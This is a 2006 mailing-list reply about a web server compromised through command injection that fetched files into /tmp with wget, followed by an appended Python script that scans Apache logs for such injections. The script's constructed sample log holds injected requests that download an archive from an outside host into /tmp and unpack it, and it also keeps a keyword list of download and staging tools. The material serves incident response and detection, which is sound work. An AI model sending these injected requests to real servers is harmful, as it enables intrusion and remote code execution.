On 4 Jan 2006, at 15:51, Pete Vickers wrote:

> Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_
> only from known good backup. You could use a boot cdrom & dd off an
> image of the disk for later analysis if you want first.

It seems that the files have been uploaded, but they haven't actually caused any damage, or even been run. Unfortunately, I don't have the resources to mount a full investigation. Grep'ing every httpd log on the machine has produced no more information, but the fact that the actual wget output was in the httpd logs leads me to think that was the way in.

> Is there some attack vector like php or such available on the
> machine ? maybe they used that to retrieve & write the file?

The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success.

> ... but access to /tmp is tricky from a chrooted httpd !

Legacy sites mean that we haven't tried to chroot apache yet. I think it's probably time to bite the bullet and get this done :)

Gaby

-- 
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
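Added example, not part of the thread or of any script on Gaby's machine: the search described above (which script was used for the command injection that fetched files into /tmp) can be done more precisely than a plain grep for "wget", since the tell-tale is a shell metacharacter in a decoded query string combined with a download or staging hint. The script below parses Apache combined-format access log lines, URL-decodes the request target (twice, so double encoding does not hide a ";"), flags lines that carry both a metacharacter and a staging hint, and tallies the flagged script paths. The log lines, the IP addresses and the script name /cgi-bin/counter.pl are constructed for the example and are assumptions, not data from the original post.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log lines in Apache "combined" format (not from the
# original thread). Line 5 mentions "wget" in a filename but is not an
# injection attempt and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jan/2006:14:02:11 +0000] "GET /cgi-bin/counter.pl?page=index.html HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [04/Jan/2006:14:02:19 +0000] "GET /cgi-bin/counter.pl?page=index.html;wget%20http://198.51.100.7/x.tgz%20-O%20/tmp/x.tgz HTTP/1.0" 200 87 "-" "Mozilla/4.0"
198.51.100.9 - - [04/Jan/2006:14:03:40 +0000] "GET /images/logo.png HTTP/1.1" 200 4321 "http://example.org/" "Mozilla/5.0"
203.0.113.5 - - [04/Jan/2006:14:04:02 +0000] "GET /cgi-bin/counter.pl?page=|cd%20/tmp;tar%20xzf%20x.tgz HTTP/1.0" 200 65 "-" "Mozilla/4.0"
192.0.2.44 - - [04/Jan/2006:14:05:00 +0000] "GET /wget-tutorial.html HTTP/1.1" 404 210 "-" "curl/7.15"
"""

# Apache combined log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that let a parameter escape a backtick / system() call in a
# CGI script: command separator, pipe, background, backtick, $(...), newline.
SHELL_META = re.compile(r'[;|&`]|\$\(|\n')

# Things an attacker typically does right after gaining command execution:
# fetch a payload and stage it in a world-writable directory.
STAGING_HINTS = ('wget', 'curl', 'fetch', 'ftp ', '/tmp', '/var/tmp',
                 '/dev/shm', 'chmod', 'perl ', 'sh ')


def decode_target(target):
    """URL-decode twice so %253B-style double encoding cannot hide a ';'."""
    return unquote(unquote(target))


def classify_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than guess
    decoded = decode_target(m.group('target'))
    script = decoded.split('?', 1)[0]          # path part = the script hit
    meta = sorted(set(SHELL_META.findall(decoded)))
    hints = [h for h in STAGING_HINTS if h in decoded.lower()]
    # Require both: a hint alone ("wget-tutorial.html") is a false positive,
    # a metacharacter alone is common in legitimate query strings ("a=1&b=2"
    # is excluded only because '&' appears without any staging hint).
    if not (meta and hints):
        return None
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'script': script,
        'status': int(m.group('status')),
        'decoded': decoded,
        'meta': meta,
        'hints': hints,
    }


def scan(log_text):
    """Classify every line of a log and return the list of findings."""
    return [f for f in (classify_line(l) for l in log_text.splitlines()) if f]


def suspect_scripts(findings):
    """Count flagged requests per script path: the most-hit path is the
    script to read first when looking for the injection."""
    return Counter(f['script'] for f in findings)


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['script']} meta={f['meta']} "
              f"hints={f['hints']}\n    {f['decoded']}")
    print("scripts to inspect:", dict(suspect_scripts(found)))
```

Run it over the real logs with `scan(open(path).read())` for each httpd access log; the '&' case deserves a note, because a legitimate `a=1&b=2` query is only kept out by the absence of a staging hint, so expect to eyeball the output rather than treat it as a verdict. POST bodies are not in the access log, so an injection through a POST parameter will show up only as a plausible-looking request followed by the odd wget output in the error log.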

